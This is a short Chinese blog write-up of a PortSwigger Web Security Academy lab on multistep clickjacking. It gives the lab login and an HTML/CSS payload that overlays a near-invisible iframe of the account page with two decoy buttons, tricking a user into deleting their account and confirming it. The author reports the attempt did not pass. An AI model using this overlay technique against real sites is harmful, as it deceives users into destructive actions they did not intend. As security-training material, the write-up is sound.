Lab: Multistep clickjacking:多点击劫持

靶场内容

这个实验室有一些受CSRF 令牌保护的帐户功能,还有一个确认对话框来防止点击劫持。为了解决这个实验,构建一个攻击,通过点击“首先点击我”和“点击我”诱饵动作来欺骗用户点击删除帐户按钮和确认对话框。您将需要在本实验中使用两个元素。

您可以使用以下凭据自行登录帐户: wiener:peter

漏洞解析

  • 这就需要两个点击劫持来完成:一个用于点击,一个用于确认
    源代码如下:
<style>
   iframe {
       position:relative;
       width:500;
       height: 700;
       opacity: 0.0001;
       z-index: 2;
   }
   .firstClick, .secondClick {
       position:absolute;
       top:530;
       left:50;
       z-index: 1;
   }
   .secondClick {
       top:295;
       left:210;
   }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://ac3d1f971eae2e4a800301af00fb00e0.web-security-academy.net/my-account"></iframe>

就不知道为啥不给我过

posted @ 2021-08-24 10:22  Zeker62  阅读(69)  评论(0编辑  收藏  举报